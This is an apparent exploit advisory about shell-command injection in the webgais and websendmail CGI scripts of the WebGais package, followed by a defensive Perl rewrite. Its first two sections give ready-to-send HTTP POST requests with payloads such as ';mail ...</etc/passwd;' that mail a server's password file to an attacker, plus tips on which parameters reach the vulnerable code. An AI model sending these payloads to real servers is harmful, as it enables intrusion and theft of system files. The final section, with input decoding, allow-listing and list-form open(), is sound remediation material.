WebGais is an interface to the GAIS search tool. It installs a few programs in /cgi-bin. The main utility is called "webgais" and does the actual interfacing with the search tool. It reads the query from a user form, and then runs the GAIS search engine for that query.

The author tried to protect the program by using single quotes around the query when he passed it to a "system" command. But he forgot one VERY important thing: to strip single quotes from the query (this was done in Glimpse). So, if we send a query like:

    query=';mail+foo@somewhere.net</etc/passwd;echo'&.....

we will trick the "protection" system.

The only problem here is that you have to provide a certain combination of input parameters to reach the vulnerable line in the script. It took me about half an hour to get those parameters right. I also had to comment out some code from the script to bypass some error messages, because I do not have the GAIS search tool installed; I only have the WEBGais interface. Of course, you won't have to modify the script at all. It should work just fine as it is.

So here's how I exploited this:

    telnet target.machine.com 80
    POST /cgi-bin/webgais HTTP/1.0
    Content-length: 85 (replace this with the actual length of the "exploit" line)

    query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph

... and it worked. But to make it work for your system too, you'll have to add other parameters, like idx_dir and data_type, which are required by the script in its original version. Just make a normal query to your WebGais server and see what all the parameters are. But remember to use "output" and "domain" as specified in my exploit. Otherwise you will end up in some other place of the script and nothing will happen.

------------------------------------------------------------------------------

Websendmail is a cgi-bin that comes with the WEBgais package, which is an interface to the GAIS search tool.
It is a PERL script that reads input from a form and sends e-mail to the specified destination. The version I am referring to is 1.0. It was released in 1995 but it is still used (I've just tested it :) ). As many other cgi-bin programs, this one does not check for special characters in the user input. Here's what it does:

    (...)
    $cmd="| $MAILBIN $VAR_receiver";
    open (PIPEOUT, $cmd);

$VAR_receiver is read from the form. The script also does a little parsing on the string to "un-webify" it (converts pluses to spaces and %xx characters to their real value). So if we set $VAR_receiver to ';mail+your_address\@somewhere.org</etc/passwd;' it will do the job.

Now for the exploit:

    telnet target.machine.com 80
    POST /cgi-bin/websendmail HTTP/1.0
    Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)

    receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a

Don't worry if the server displays an error message. The password file is on the way :). You can use anything for the "sender", "rtnaddr", "subject" and "content", just make sure they're there, the script checks for them.
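Both problems described above (the single-quoted "system" call in webgais and the two-argument pipe open in websendmail) have the same root cause: user input is handed to /bin/sh as part of a command string, so shell metacharacters such as ';', '<' and '|' are interpreted. The following Perl is an added example written for this page, not code from the WEBgais package: it shows how the websendmail fragment could be rewritten so that no shell is involved at all, and it validates the receiver only after the same "un-webify" decoding the script performs, since checking the raw form value would let an encoded character slip through. The $MAILBIN path, the address regex and the sample inputs are assumptions; the original script's values are not shown on the page.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumed mailer path; the real script's $MAILBIN value is not on the page.
my $MAILBIN = '/usr/lib/sendmail';

# Decode a form value the way the page describes: '+' becomes a space and
# %xx becomes the byte it encodes. Validation must run on the decoded value.
sub unwebify {
    my ($s) = @_;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $s;
}

# Allow-list check on the decoded receiver: only address characters,
# no leading '-' (so it cannot be read as a mailer option), bounded length.
sub receiver_is_safe {
    my ($addr) = @_;
    return 0 unless defined $addr;
    return 0 if length($addr) > 254;
    return 0 if $addr =~ /\A-/;
    return $addr =~ /\A[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\z/ ? 1 : 0;
}

# Hardened replacement for:  $cmd="| $MAILBIN $VAR_receiver"; open(PIPEOUT,$cmd);
# The list form of open() execs the mailer directly, so even if a bad
# address got this far it would arrive as one literal argument, never as
# shell syntax. The allow-list check rejects it before that point anyway.
sub send_mail_safely {
    my ($raw_receiver, $body) = @_;
    my $receiver = unwebify($raw_receiver);
    die "refusing unsafe receiver\n" unless receiver_is_safe($receiver);
    open(my $pipeout, '|-', $MAILBIN, '-oi', $receiver)
        or die "cannot run $MAILBIN: $!\n";
    print {$pipeout} $body;
    close($pipeout) or die "mailer exited with status $?\n";
    return 1;
}

# Constructed form values for demonstration (not taken from a real request).
my @samples = (
    'user%40example.org',                                  # decodes to user@example.org
    '%3Bmail+attacker%40example.net%3C%2Fetc%2Fpasswd%3B', # decodes to the injection shape from the advisory
    '-oQ%2Ftmp+user%40example.org',                        # option-looking prefix, rejected by the leading '-' rule
);

foreach my $raw (@samples) {
    my $decoded = unwebify($raw);
    printf "%-55s -> %s\n", $decoded,
        receiver_is_safe($decoded) ? 'accepted' : 'rejected';
}
```

The same change fixes the webgais case: wrapping a value in single quotes only helps if every single quote inside the value is removed or escaped, whereas passing the query as a separate list element to system() or open() sidesteps quoting entirely. Allow-listing the expected shape of each field (an address, an index directory name) and rejecting everything else is the check to keep regardless of how the command is launched.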